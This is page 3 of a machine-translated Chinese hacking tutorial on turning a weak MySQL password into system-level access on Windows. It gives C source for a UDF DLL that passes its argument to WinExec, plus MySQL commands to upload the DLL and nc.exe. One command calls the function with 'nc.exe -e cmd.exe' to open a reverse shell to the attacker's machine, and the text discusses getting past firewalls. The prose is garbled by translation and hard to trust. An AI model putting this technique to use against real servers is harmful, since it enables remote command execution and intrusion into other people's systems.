Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
How teaches you to obtain the system jurisdiction through the Mysql weak password(3)
  Add date: 10/08/2008   Publishing date: 10/08/2008   Hits: 1
Total 4 pages, Current page:3, Jump to page:
 

After a while, you had system jurisdiction shell,
Because he is hook the recv version, therefore puts on the wall ability to be very strong, I am in the previous mix.dll bounce defeat's situation, only then uses this, he really fulfils expectations! After entering the system, discovered that it has a pair of network card, day network firewall personal version V2.73, opens 3306 ports merely outward, thus it can be seen, my_udf.dll has the very strong penetration firewall to result in ability truly! But he also has bug, after was we connected again activate this function, (uses has ordered “select my_udfdoor (''); ” latter), no matter you whether to connect, so long as has carried out:
Mysql>drop function my_udfdoor; , mysql also reports wrong, then hangs,

Therefore, you use this dll document to be unable to delete your trace!
Finally, however we write one from the definition dll document. Looked that can solve the problem.

We use mysql to result in udf merely the demonstration to make the pattern plate then! Watches his demonstration:
#include <stdlib.h>
#include <winsock.h>
#include <mysql.h>
extern “C” {
char *my_name (UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error);
// compatible C
}
char *my_name (UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)
{
char * me = “my name”;
return me;
// will transfer this UDF to return to my name
}
Very simple? Good, we only needed to change slightly may have our dll document:
Below is my nabs Crackme is the revision:
#include <stdlib.h>
#include <windows.h>
#include “mysql.h”
extern “C” __declspec(dllexport)char *sys_name (UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error); // sys_name is the letter proper name, you may revise willfully
__declspec(dllexport) char *sys_name (UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) // here sys_name must certainly change!
{
char me[256] = {0};
if (args->arg_count == 1) {
strncpy(me, args->args[0], args->lengths[0]);
me[args->lengths[0]]='\0';
WinExec(me, SW_HIDE); // is carries out with it orders willfully
} else
strcpy (me, “do nonthing. \ n”);
return me;
}
Good, we translated the sysudf.dll document to be possible! We use him to test!
Watches a drill does:
Mysql> \. C:\sysudf.dll .txt
Mysql>Create function sys_name returns string soname 'C:\ \ windows \ \ sysudf.dll';
Mysql> \. Nc.exe.txt // also uploads nc.exe
Mysql>select sys_name ('nc.exe - e cmd.exe my ip 8080');
//sys_name parameter only then, the parameter assigns the system order which must carry out
Good, had a look to bounce shell in Win2003,
Certainly, our you might also not bounce shell, but carried out other orders, no matter but whether to carry out successfully, has not returned obviously, must therefore guarantee that the forms of field orders were correct. Regarding this dll document, undergoes the test, no matter when “drop function sys_name; ”, the bulletin is not wrong, simultaneously may also move many times the different order. As for his shortcoming, is he puts on the wall ability not to calculate equally with Mix.dll is too strong, but regarding does not penetrate really the wall, moved other orders is directly the best choice.

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * Next>>
Prev:How teaches you to deal with the DDoS rapids Next:Teaches you to teach the new military recruits to eliminate SQL the server diary the method

Comment:

Category: Home > hacker course
Home